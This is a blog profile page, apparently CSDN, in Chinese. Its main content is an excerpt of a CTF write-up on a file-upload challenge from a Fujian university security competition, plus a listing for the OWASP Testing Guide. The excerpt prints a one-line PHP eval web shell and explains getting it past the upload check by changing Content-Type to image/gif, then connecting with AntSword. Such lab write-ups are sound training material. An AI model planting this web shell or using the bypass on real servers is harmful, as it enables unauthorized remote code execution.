- 博客(1)
- 资源 (1)
- 收藏
- 关注
原创 i春秋练习——第三届“百越杯”福建省高校网络空间安全大赛-web-do you know upload
首先是一个文件上传,比较基础。选择上传111.php,内容是一句话马<?php eval($_POST['cmd']);?> burpsuit抓包修改Content-Type为image/gif(任一种图片都行),这类漏洞可以搭建一个upload-lab本地练一练。 显示上传成功 接下来使用蚁剑连接,连接密码就是之前一句话写的cmd,编码器可以选default,这题没...
2020-01-07 11:48:36 560
OWASP测试指南2008V3.0.pdf
总体而言,OWASP 的各个指南是对开发及维系安全的应用程序很好的出发点。开发者指南 能指导你如何设计和开
发安全的应用程序,而 代码检测指南 则会告诉你如何为代码作安全检测,而 测试指南 会指导你如何验证你的应用
程序的安全性。我极力推荐你使用这些指南在你的应用程序开发
2019-10-21
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人